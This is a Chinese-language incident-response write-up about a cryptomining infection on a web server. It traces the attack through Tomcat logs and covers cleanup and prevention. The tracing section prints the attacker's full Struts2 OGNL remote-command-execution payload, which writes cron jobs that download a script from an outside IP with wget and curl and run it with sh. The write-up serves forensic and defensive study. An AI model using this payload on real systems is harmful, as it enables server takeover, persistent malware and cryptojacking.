隨着虛擬貨幣的瘋狂炒作,利用挖礦腳本來實現流量變現,使得挖礦病毒成為不法分子利用最為頻繁的攻擊方式。新的挖礦攻擊展現出了類似蠕蟲的行為,並結合了高級攻擊技術,以增加對目標服務器感染的成功率,通過利用永恆之藍(EternalBlue)、web攻擊多種漏洞(如Tomcat弱口令攻擊、Weblogic WLS組件漏洞、Jboss反序列化漏洞、Struts2遠程命令執行等),導致大量服務器被感染挖礦程序的現象 。
0x01 應急場景
某天,安全管理員在登錄安全設備巡檢時,發現某台網站服務器持續向境外IP發起連接,下載病毒源:
0x02 事件分析
A、排查過程
登錄服務器,查看系統進程狀態,發現不規則命名的異常進程、異常下載進程 :
下載logo.jpg,包含腳本內容如下:
到這里,我們可以發現攻擊者下載logo.jpg並執行了里面了shell腳本,那這個腳本是如何啟動的呢?
通過排查系統開機啟動項、定時任務、服務等,在定時任務里面,發現了惡意腳本,每隔一段時間發起請求下載病毒源,並執行 。
B、溯源分析
在Tomcat log日志中,我們找到這樣一條記錄:
對日志中攻擊源碼進行摘錄如下:
{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
可以發現攻擊代碼中的操作與定時任務中異常腳本一致,據此推斷黑客通過Struct 遠程命令執行漏洞向服務器定時任務中寫入惡意腳本並執行。
C、清除病毒
1、刪除定時任務:
2、終止異常進程:
D、漏洞修復
升級struts到最新版本
0x03 防范措施
針對服務器被感染挖礦程序的現象,總結了幾種預防措施:
1、安裝安全軟件並升級病毒庫,定期全盤掃描,保持實時防護
2、及時更新 Windows安全補丁,開啟防火牆臨時關閉端口
3、及時更新web漏洞補丁,升級web組件
推薦閱讀:
最后
歡迎關注個人微信公眾號:Bypass--,每周原創一篇技術干貨。
